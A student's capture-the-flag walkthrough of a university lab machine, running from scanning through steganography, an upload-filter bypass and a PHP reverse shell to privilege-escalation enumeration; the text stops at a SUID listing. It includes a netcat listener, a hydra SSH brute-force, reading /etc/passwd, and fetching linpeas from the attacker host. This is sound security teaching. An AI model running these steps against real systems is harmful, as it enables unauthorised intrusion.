Gamma CTF

This was a capture the flag project at my university (AUB), provided by Dr. Hussein Bakri, the creator of this CTF.

Table of Contents:

1. Scanning

   • TCP Scan

   • UDP Scan

2. Port 80

   • Directory Brute-Forcing (Gobuster)

   • Web server Vulnerability Scanning (Nikto)

   • Source Code Inspection

   • Steganography

   • Admin Login

   • Exploiting File Upload

   • Initial Foothold (www-data)

3. Privilege Escalation

   • Linpeas

   • Manual Privilege Escalation Techniques

   • Kernel Exploit

   • Root Flag

4. Other Attack Vectors

   • Trying other Privilege Escalation Exploits

   • Nessus Scan

   • Exploring Other Ports

5. Remediations and Recommendations for Machine Owner

6. References

1- Scanning

TCP

nmap -sS -sV -p- 192.168.229.158

Results

┌──(kali㉿kali)-[~]
└─$ nmap -sS -sV -p- 192.168.229.158
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-26 13:41 EET
Nmap scan report for 192.168.229.158
Host is up (0.00066s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4p1 Ubuntu 10 (Ubuntu Linux; protocol 2.0)
53/tcp   open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
5355/tcp open  llmnr?
MAC Address: 00:0C:29:78:F8:7B (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 132.41 seconds

Ports Open:

22/tcp   open  ssh     OpenSSH 7.4p1 Ubuntu 10 (Ubuntu Linux; protocol 2.0)
53/tcp   open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
5355/tcp open  llmnr?

Aggressive Scan on Open Ports

sudo nmap -sT -A -p22,53,80,5355 192.168.229.158

Results:

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4p1 Ubuntu 10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 98:b7:f5:6b:0d:58:1d:7b:58:7d:1a:99:fb:b1:8f:04 (RSA)
|   256 66:b4:4b:40:e6:c9:76:93:31:aa:fc:ff:9a:40:a9:f9 (ECDSA)
|_  256 55:c6:b2:01:0f:16:1c:68:96:e2:bb:b1:fe:ff:59:c2 (ED25519)
53/tcp   open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp   open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: School of Engineering
5355/tcp open  llmnr?
MAC Address: 00:0C:29:78:F8:7B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 4.10 (99%), Linux 3.2 - 4.9 (97%), Linux 3.16 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.10 - 4.11 (94%), Linux 4.4 (94%), Linux 3.13 (94%), OpenWrt Chaos Calmer 15.05 (Linux 3.18) or Designated Driver (Linux 4.1 or 4.4) (94%), Linux 3.2 - 3.16 (94%), Linux 3.1 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

UDP

nmap -sU 192.168.229.158

Results:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-30 04:03 EET
Stats: 0:00:11 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 2.60% done; ETC: 04:10 (0:06:52 remaining)
Stats: 0:03:15 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 20.68% done; ETC: 04:19 (0:12:28 remaining)
Stats: 0:16:35 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 99.20% done; ETC: 04:20 (0:00:08 remaining)
Nmap scan report for 192.168.229.158
Host is up (0.00072s latency).
Not shown: 997 closed udp ports (port-unreach)
PORT     STATE         SERVICE
53/udp   open          domain
68/udp   open|filtered dhcpc
5355/udp open|filtered llmnr
MAC Address: 00:0C:29:78:F8:7B (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1019.81 seconds

Vulnerability Scanning

nmap --script vuln -p 22,53,80,5355 192.168.229.158

Results:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-30 03:48 EET
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.229.158
Host is up (0.00073s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
53/tcp   open  domain
80/tcp   open  http
| http-fileupload-exploiter: 
|   
|     Couldn't find a file-type field.
|   
|_    Couldn't find a file-type field.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-internal-ip-disclosure: 
|_  Internal IP Leaked: 127.0.1.1
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|   /administrator/: Possible admin folder
|   /administrator/index.php: Possible admin folder
|   /css/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|   /images/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|   /js/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_  /vendor/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
5355/tcp open  llmnr
MAC Address: 00:0C:29:78:F8:7B (VMware)

Nmap done: 1 IP address (1 host up) scanned in 64.43 seconds

2- Port 80

Gobuster

gobuster dir -u http://192.168.229.158 -w /usr/share/wordlists/dirb/common.txt

Results:

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.229.158
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 280]
/.hta                 (Status: 403) [Size: 280]
/.htpasswd            (Status: 403) [Size: 280]
/administrator        (Status: 301) [Size: 326] [--> http://192.168.229.158/administrator/]
/css                  (Status: 301) [Size: 316] [--> http://192.168.229.158/css/]
/fonts                (Status: 301) [Size: 318] [--> http://192.168.229.158/fonts/]
/images               (Status: 301) [Size: 319] [--> http://192.168.229.158/images/]
/index.html           (Status: 200) [Size: 32410]
/js                   (Status: 301) [Size: 315] [--> http://192.168.229.158/js/]
/server-status        (Status: 403) [Size: 280]
/vendor               (Status: 301) [Size: 319] [--> http://192.168.229.158/vendor/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

Important Directories:

/administrator
/images
/vendor

Nikto

nikto -h http://192.168.229.158

Results:

- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          192.168.229.158
+ Target Hostname:    192.168.229.158
+ Target Port:        80
+ Start Time:         2024-11-26 13:46:30 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /images: IP address found in the 'location' header. The IP is "127.0.1.1". See: https://portswigger.net/kb/issues/00600300_private-ip-addresses-disclosed
+ /images: The web server may reveal its internal or real IP in the Location header via a request to with HTTP/1.0. The value is "127.0.1.1". See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0649
+ /: Server may leak inodes via ETags, header found with file /, inode: 7e9a, size: 627c629320964, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /administrator/: This might be interesting.
+ /css/: Directory indexing found.
+ /css/: This might be interesting.
+ /images/: Directory indexing found.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /administrator/index.php: Admin login page/section found.
+ 8102 requests: 0 error(s) and 13 item(s) reported on remote host
+ End Time:           2024-11-26 13:46:47 (GMT2) (17 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Firefox

Now, lets open the website on firefox:

Lets visit "http://192.168.229.158"

Source code:

Source code for "http://192.168.229.158" After deeply inspecting the source code, nothing seems suspicious.

/administrator

Now, lets check the source code for this directory, which appeared in 'nikto' and in 'gobuster':

Login Page:

Source Code:

There is an important comment in the source code, which is: " Find the image hidden around, Do you know steganography in images bud? "

/images

Lets now move onto the /images directory, since steganography is likely present as mentioned in the hint above.

Flag.txt found!

Lets read its content.

Flag.txt: "Almost there!

Odin is the god of wisdom. He bestoys "hidden" knowledge that only the initiate can know. Did you notice something hidden in its image?

Dr. Hussein Bakri "

Hint: There is something hidden in odin's image.

In this directory also, we can see that there is a png file named OdinHiddenKnowledge.png.

Lets check it out:

Steganography

Lets now download this image to out attacker machine, in order to do some steganography, and find what is hidden inside it.

exiftool

exiftool OdinHiddenKnowledge.png

ExifTool Version Number         : 13.00
File Name                       : OdinHiddenKnowledge.png
Directory                       : .
File Size                       : 689 kB
File Modification Date/Time     : 2024:11:26 14:03:40+02:00
File Access Date/Time           : 2024:11:26 14:03:40+02:00
File Inode Change Date/Time     : 2024:11:26 14:03:40+02:00
File Permissions                : -rw-rw-r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 759
Image Height                    : 890
Bit Depth                       : 8
Color Type                      : RGB with Alpha
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
Image Size                      : 759x890
Megapixels                      : 0.676

strings

strings OdinHiddenKnowledge.png

nothing seems suspicious

steghide

steghide extract -sf OdinHiddenKnowledge.png

Enter passphrase: 
steghide: the file format of the file "OdinHiddenKnowledge.png" is not supported.

binwalk

binwalk OdinHiddenKnowledge.png

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 759 x 890, 8-bit/color RGBA, non-interlaced
41            0x29            Zlib compressed data, compressed
18017         0x4661          JBOOT STAG header, image id: 8, timestamp 0xD51B2DC9, image size: 4129282426 bytes, image JBOOT checksum: 0x7BB1, header JBOOT checksum: 0xADFD

Important things found here:

• A PNG starting at 0x0.

• ZLib compressed data at 0x29.

• A suspicious header at 0x4661.

Lets now extract them:

binwalk -e OdinHiddenKnowledge.png

Result:

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
41            0x29            Zlib compressed data, compressed

WARNING: One or more files failed to extract: either no utility was found or it's unimplemented

Lets check this directory: OdinHiddenKnowledge.png.extracted_

ls -la _OdinHiddenKnowledge.png.extracted

total 684
drwxrwxr-x 2 kali kali   4096 Nov 26 15:03 .
drwxrwxr-x 3 kali kali   4096 Nov 26 15:03 ..
-rw-rw-r-- 1 kali kali      0 Nov 26 15:03 29
-rw-rw-r-- 1 kali kali 689084 Nov 26 15:03 29.zlib

Results:

• There is an empty file 29.

• There is a zip file 29.zlib.

Lets check the contents of 29.zlib:

file 29.zlib

result:

29.zlib: zlib compressed data

Lets decompress this zip:

Nothing important.

zsteg

zsteg -a OdinHiddenKnowledge.png

Results:

b1,rgb,lsb,xy       .. text: "godofhacking is HusseinBakri. This incantation allows you access for sure."
b2,r,msb,xy         .. text: "}UWUUUUUUUUTUUUQ"
b2,g,msb,xy         .. text: "WUUUUUUUUTUUUQ"
b2,b,msb,xy         .. text: "]_WUUUUUUUUTUUUQ"
b2,rgb,msb,xy       .. text: "UUUUUUUUUUUUUUUUUUUUUUUUUU@UUUUUUUUUUU"
b2,bgr,msb,xy       .. text: "UUUUUUUUUUUUUUUUUUUUUUUUUU@UUUUUUUUUUU"
b2,abgr,msb,xy      .. text: ["W" repeated 35 times]
b3,b,msb,xy         .. file: MPEG ADTS, layer I, v2,  96 kbps, Monaural
b3,abgr,msb,xy      .. file: MPEG ADTS, layer I, v2,  96 kbps, Monaural
b3p,r,msb,xy        .. text: "[{[[[[[[[[[[[K[[[[[YK"
b3p,g,msb,xy        .. text: "[[[[[[[[[[[K[[[[[YK"
b3p,b,msb,xy        .. text: "{[[[[[[[[[[[K[[[[[YK"
b3p,rgb,msb,xy      .. text: "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[\t[[[[[[[[[[[[[[[[\t[[[\tR\t"
b3p,bgr,msb,xy      .. text: "[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[\t[[[[[[[[[[[[[[[[\t[[[\tR\t"
b3p,abgr,msb,xy     .. text: ["_" repeated 35 times]
b4,r,msb,xy         .. text: "wwwwwwwwwwwwwwwwwswwwwwww7w757sw3wwwwwwWsQSUswwww73s3wwwwWu115w3w754wwWuw"
b4,g,msb,xy         .. text: "wwwwwwwwwwwwwwwwwswwwwwww7w757sw3wwwwwwWsQSUswwww73s3wwwwWu115w3w754wwWuw"
b4,b,lsb,xy         .. file: AIX core file 64-bit
b4,b,msb,xy         .. text: "wwwwwwwwwwwwwwwwwswwwwwww7w757sw3wwwwwwWsQSUswwww73s3wwwwWu115w3w754wwWuw"
b4,bgr,msb,xy       .. file: MPEG ADTS, layer I, v2, 112 kbps, 24 kHz, Monaural
b5,g,msb,xy         .. file: MPEG ADTS, layer II, v1, Monaural
b5,b,lsb,xy         .. file: MPEG ADTS, layer II, v1, 384 kbps, Monaural
b5,bgr,lsb,xy       .. file: MPEG ADTS, layer II, v1, JntStereo
b5p,r,msb,xy        .. text: "ooooooooooooooooogooooooo/o/+/go'ooooooOgCGKgoooo/'g'ooooOk#\"+o'o/+(ooOko\r&O\r+ooooooo'"
b5p,g,msb,xy        .. text: "ooooooooooooooooogooooooo/o/+/go'ooooooOgCGKgoooo/'g'ooooOk#\"+o'o/+(ooOko\r&O\r+ooooooo'"
b5p,b,lsb,xy        .. file: MPEG ADTS, layer I, v2, Monaural
b5p,b,msb,xy        .. text: "ooooooooooooooooogooooooo/o/+/go'ooooooOgCGKgoooo/'g'ooooOk#\"+o'o/+(ooOko\r&O\r+ooooooo'"
b5p,rgb,msb,xy      .. text: "ooooooooooooooooooooooooooooooooooo'oooooooooooooooo'ooo'K'"
b5p,bgr,msb,xy      .. text: "ooooooooooooooooooooooooooooooooooo'oooooooooooooooo'ooo'K'"
b5p,abgr,msb,xy     .. file: ddis/ddif
b6,g,msb,xy         .. file: MPEG ADTS, layer I, v2, Monaural
b6,abgr,msb,xy      .. file: ddis/ddif
b6p,r,msb,xy        .. text: "_________________O_______"
b6p,g,msb,xy        .. text: "_________________O_______"
b6p,b,lsb,xy        .. file: , Monaural
b6p,b,msb,xy        .. text: "_________________O_______"
b6p,rgb,msb,xy      .. text: ["_" repeated 35 times]
b6p,abgr,msb,xy     .. file: ddis/ddif
b7,r,lsb,xy         .. file: AIX core file fulldump 32-bit
b7,g,lsb,xy         .. file: , Monaural
b7,rgb,lsb,xy       .. file: AIX core file fulldump 32-bit
b7p,r,msb,xy        .. text: ["?" repeated 17 times]
b7p,g,msb,xy        .. text: ["?" repeated 17 times]
b7p,b,lsb,xy        .. file: MPEG ADTS, layer II, v1, Monaural
b7p,b,msb,xy        .. text: ["?" repeated 17 times]
b7p,rgb,msb,xy      .. text: ["?" repeated 35 times]
b7p,bgr,msb,xy      .. text: ["?" repeated 35 times]
b7p,abgr,msb,xy     .. file: ddis/ddif
b8,r,msb,xy         .. file: RDI Acoustic Doppler Current Profiler (ADCP)
b8,bgr,msb,xy       .. file: ddis/ddif
b1,bgr,lsb,xy,prime .. /var/lib/gems/3.1.0/gems/zsteg-0.2.13/lib/zsteg/checker/wbstego.rb:41:in `to_s': stack level too deep (SystemStackError)
        from /var/lib/gems/3.1.0/gems/iostruct-0.2.0/lib/iostruct.rb:167:in `inspect'
        from /var/lib/gems/3.1.0/gems/zsteg-0.2.13/lib/zsteg/checker/wbstego.rb:41:in `to_s'
        from /var/lib/gems/3.1.0/gems/iostruct-0.2.0/lib/iostruct.rb:167:in `inspect'
        from /var/lib/gems/3.1.0/gems/zsteg-0.2.13/lib/zsteg/checker/wbstego.rb:41:in `to_s'
        from /var/lib/gems/3.1.0/gems/iostruct-0.2.0/lib/iostruct.rb:167:in `inspect'
        from /var/lib/gems/3.1.0/gems/zsteg-0.2.13/lib/zsteg/checker/wbstego.rb:41:in `to_s'
        from /var/lib/gems/3.1.0/gems/iostruct-0.2.0/lib/iostruct.rb:167:in `inspect'
        from /var/lib/gems/3.1.0/gems/zsteg-0.2.13/lib/zsteg/checker/wbstego.rb:41:in `to_s'
         ... 10066 levels...
        from /var/lib/gems/3.1.0/gems/zsteg-0.2.13/lib/zsteg.rb:26:in `run'
        from /var/lib/gems/3.1.0/gems/zsteg-0.2.13/bin/zsteg:8:in `<top (required)>'
        from /usr/local/bin/zsteg:25:in `load'
        from /usr/local/bin/zsteg:25:in `<main>'
        

There is an EXTREMELY important hint:

Hint: "godofhacking is HusseinBakri. This incantation allows you access for sure"

Lets try those as credentials in the /administrator.

username: godofhacking password: HusseinBakri

And........ we are in!

File Upload

Lets try now to upload a php reverse shell.

Note: We still need to know where those uploads go to.

From pentest monkey, I downloaded a reverse shell, and modified the port and the ip.

Now, lets try to upload the reverse shell.

When I pressed on submit, it redirected me to this page:

So, I wasn't able to upload.

Lets see what is the cause of this problem.

Lets try to rename my file from pentest_monkey_php_reverse_shell.php to pentest_monkey_php_reverse_shell.php.jpg, and try to re-upload.

Still, not working.

Lets try renaming it to .phtml and .php3 and .png.

• phtml didn't work.

• php3 didn't work also.

• png also didn't work.

Before I move onto burp suite, for one last time, I am going to upload a true png file, and a true jpg file, to confirm that uploading isn't working.

... and yes, both also didn't work.

Lets try our luck and SSH into the machine using those credentials:

username: godofhacking password: HusseinBakri

┌──(kali㉿kali)-[~/gamma_project]
└─$ ssh godofhacking@192.168.229.158
godofhacking@192.168.229.158's password: 
Permission denied, please try again.

Didn't work.

Before we move on, this seems suspicious: ff4085ad157354dc8ea67a848e7c2270b4a19282713cf3a7ecf8e0ffbb159ed1

It is found here in the source code:

And, when I upload a file, it takes me to "http://192.168.229.158/administrator/ff4085ad157354dc8ea67a848e7c2270b4a19282713cf3a7ecf8e0ffbb159ed1.php"

This looks like a hash.

Lets visit this website "https://hashes.com/en/decrypt/hash", and decrypt it to see if it contains something useful.

Output: `ff4085ad157354dc8ea67a848e7c2270b4a19282713cf3a7ecf8e0ffbb159ed1:upload

Nice. So this hash is upload.

I will try to append upload to the url, and try to reupload.

The resulting url: http://192.168.229.158/administrator/husseinbakri.php/upload

Lets try to re-upload the reverse shell file:

The site says: The image format must be jpg,jpeg,gif,png

Lets change the extension to .jpg.php:

mv reverse_monkey_shell.php reverse_monkey_shell.jpg.php

Upload Success (Top left).

What we have to do now is trigger a reverse shell.

Before that, I noticed that everything works after /administrator, what I mean by this, is if I write http://192.168.229.158/administrator/husseinbakri.php/test for example, I can upload a file, and it works.

So, now, lets trigger this reverse shell:

I tried entering http://192.168.229.158/administrator/husseinbakri.php/reverse_shell.jpg.php, but didn't work.

I then searched in all the directories that were previously found, such as images, vendor..., but also the reverse shell wasn't there.

However, I noticed something important. When I was uploading in http://192.168.229.158/administrator/husseinbakri.php/, it was taking me to this url: "http://192.168.229.158/administrator/ff4085ad157354dc8ea67a848e7c2270b4a19282713cf3a7ecf8e0ffbb159ed1.php"

So, what I did now, is I edited the url, and renamed it to "http://192.168.229.158/administrator/reverse_shell.jpg.php".

and boom! It worked!

In the meantime, a netcat session was opened with:

nc -lvnp 1234

Now, lets upgrade the connection using:

python3 -c 'import pty; pty.spawn("/bin/bash")'

3- Privilege Escalation

Enumerating www-data

Lets do some enumeration, since now we have our initial foothold on the machine:

www-data@gamma:/$ whoami
whoami
www-data
www-data@gamma:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@gamma:/$ 

Kernel:

www-data@gamma:/$ uname -a
uname -a
Linux gamma 4.10.0-19-generic #21-Ubuntu SMP Thu Apr 6 17:04:57 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

Files:

www-data@gamma:/$ ls -la
ls -la
total 483912
drwxr-xr-x  23 root root      4096 Nov 25 23:03 .
drwxr-xr-x  23 root root      4096 Nov 25 23:03 ..
-rw-------   1 root root        31 Nov 25 23:03 .bash_history
drwxr-xr-x   2 root root      4096 Sep 16  2020 bin
drwxr-xr-x   3 root root      4096 Sep 16  2020 boot
drwxr-xr-x  18 root root      3760 Dec  2 20:21 dev
drwxr-xr-x 100 root root      4096 Nov 25 21:18 etc
drwxr-xr-x   3 root root      4096 Sep 16  2020 home
lrwxrwxrwx   1 root root        33 Sep 16  2020 initrd.img -> boot/initrd.img-4.10.0-19-generic
drwxr-xr-x  23 root root      4096 Sep 16  2020 lib
drwxr-xr-x   2 root root      4096 Sep 16  2020 lib64
drwx------   2 root root     16384 Sep 16  2020 lost+found
drwxr-xr-x   3 root root      4096 Sep 16  2020 media
drwxr-xr-x   2 root root      4096 Apr 12  2017 mnt
drwxr-xr-x   2 root root      4096 Apr 12  2017 opt
dr-xr-xr-x 210 root root         0 Dec  2 20:21 proc
drwx------   4 root root      4096 Nov 25 23:09 root
drwxr-xr-x  25 root root       900 Dec  2 20:21 run
drwxr-xr-x   2 root root     12288 Sep 16  2020 sbin
drwxr-xr-x   2 root root      4096 Apr  6  2017 snap
drwxr-xr-x   2 root root      4096 Apr 12  2017 srv
-rw-------   1 root root 495416320 Sep 16  2020 swapfile
dr-xr-xr-x  13 root root         0 Dec  2 20:21 sys
drwxrwxrwt   3 root root      4096 Dec  2 20:24 tmp
drwxr-xr-x  10 root root      4096 Sep 16  2020 usr
drwxr-xr-x  14 root root      4096 Sep 16  2020 var
lrwxrwxrwx   1 root root        30 Sep 16  2020 vmlinuz -> boot/vmlinuz-4.10.0-19-generic

Lets check usernames on the system:

www-data@gamma:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:109::/var/run/dbus:/bin/false
lxd:x:107:65534::/var/lib/lxd/:/bin/false
uuidd:x:108:113::/run/uuidd:/bin/false
postgres:x:109:115:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
bind:x:111:117::/var/cache/bind:/bin/false
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
pollinate:x:113:1::/var/cache/pollinate:/bin/false
exploiter:x:1000:1000:exploiter,,,:/home/exploiter:/bin/bash
apache2:x:1001:1001:,,,:/var/www:/bin/bash

Username found: exploiter

SSH Bruteforce

Since we found a username named exploiter, lets try to bruteforce into ssh.

hydra -t 64 -l exploiter -P /usr/share/wordlists/rockyou.txt ssh://192.168.229.158

Result:

Hydra v9.6dev (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-03 00:49:02
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking ssh://192.168.229.158:22/
[STATUS] 619.00 tries/min, 619 tries in 00:01h, 14343832 to do in 386:13h, 12 active
[STATUS] 396.33 tries/min, 1189 tries in 00:03h, 14343263 to do in 603:10h, 11 active
[STATUS] 326.57 tries/min, 2286 tries in 00:07h, 14342166 to do in 731:58h, 11 active

Nothing found in the first 2286 tries...

Linpeas

Now, i will upload linpeas from my host machine to the vulnerable machine.

On my host machine (In the directory that contains linpeas.sh):

python3 -m http.server 8080

On the target machine, lets go to the /tmp directory and download linpeas.sh:

cd /tmp
www-data@gamma:/tmp$ ls
ls
www-data@gamma:/tmp$ ls -la
ls -la
total 8
drwxrwxrwt  2 root root 4096 Dec  2 20:21 .
drwxr-xr-x 23 root root 4096 Nov 25 23:03 ..
www-data@gamma:/tmp$ wget http://192.168.229.150:8080/linpeas.sh
wget http://192.168.229.150:8080/linpeas.sh
--2024-12-02 20:24:21--  http://192.168.229.150:8080/linpeas.sh
Connecting to 192.168.229.150:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 823059 (804K) [text/x-sh]
Saving to: 'linpeas.sh'

linpeas.sh          100%[===================>] 803.77K  --.-KB/s    in 0.006s  

2024-12-02 20:24:21 (135 MB/s) - 'linpeas.sh' saved [823059/823059]

www-data@gamma:/tmp$ ls
ls
linpeas.sh

Making the script executable:

chmod +x linpeas.sh

Running linpeas:

./linpeas.sh

Important things found from linpeas.sh"

• The sudo version (1.8.19p1) on the system may be vulnerable to the "Baron Samedit" exploit.

• Exploit CVE-2021-4034 ("PwnKit"); This is a known privesc vulnerability in pkexec (part of Polkit). The system appears vulnerable to it.

• The /usr/share/openssh/sshd_config file is world-readable.

• The /tmp folder is writable, and LinPEAS has identified writable files owned by www-data and others in /tmp and /var/tmp.

• Several cron jobs are running, and /etc/cron.daily, /etc/cron.weekly, and similar directories are populated.

• Several SUID binaries (/usr/bin/pkexec, /usr/lib/snapd/snap-confine) are present.

• A .bash_history file is available for the apache2 user.

Exploit db

3 exploits found for our ubuntu version:

Manual Privilege Escalation

SUID

find / -type f -perm -04000 -ls 2>/dev/null

Result:

www-data@gamma:/$ find / -type f -perm -04000 -ls 2>/dev/null
find / -type f -perm -04000 -ls 2>/dev/null
   149353     40 -rwsr-xr-x   1 root     root        38984 Mar  7  2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
   402109     76 -rwsr-xr-x   1 root     root        76168 Apr  6  2017 /usr/lib/snapd/snap-confine
   149529     16 -rwsr-xr-x   1 root     root        14328 Oct 21  2016 /usr/lib/policykit-1/polkit-agent-helper-1
   148761    432 -rwsr-xr-x   1 root     root       440728 Mar 30  2017 /usr/lib/openssh/ssh-keysign
   131590     44 -rwsr-xr--   1 root     messagebus    42992 Oct 11  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
   131600     12 -rwsr-xr-x   1 root     root          10232 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
   131393     56 -rwsr-xr-x   1 root     root          54256 Sep 20  2016 /usr/bin/passwd
   148991     52 -rwsr-sr-x   1 daemon   daemon        51464 Dec 22  2016 /usr/bin/at
   149475     36 -rwsr-xr-x   1 root     root          32944 Sep 20  2016 /usr/bin/newgidmap
   131382     40 -rwsr-xr-x   1 root     root          39904 Sep 20  2016 /usr/bin/newgrp
   149476     36 -rwsr-xr-x   1 root     root          32944 Sep 20  2016 /usr/bin/newuidmap
   149526     24 -rwsr-xr-x   1 root     root          22520 Oct 21  2016 /usr/bin/pkexec
   131479    140 -rwsr-xr-x   1 root     root         140944 Jan 13  2017 /usr/bin/sudo
   131228     72 -rwsr-xr-x   1 root     root          71824 Sep 20  2016 /usr/bin/chfn
   131300     76 -rwsr-xr-x   1 root     root          75304 Sep 20  2016 /usr/bin/gpasswd
   131230     40 -rwsr-xr-x   1 root     root          40432 Sep 20  2016 /usr/bin/chsh
   148699     20 -rwsr-xr-x   1 root     root          18448 Mar  9  2017 /usr/bin/traceroute6.iputils
   532095      8 -rwsr-xr-x   1 www-data www-data       5096 Dec  2 21:56 /tmp/..a
   526038      8 -rwsr-xr-x   1 www-data www-data       5096 Dec  2 21:56 /tmp/a
   528794      8 -rwsr-xr-x   1 www-data www-data       5096 Dec  2 21:56 /tmp/.a
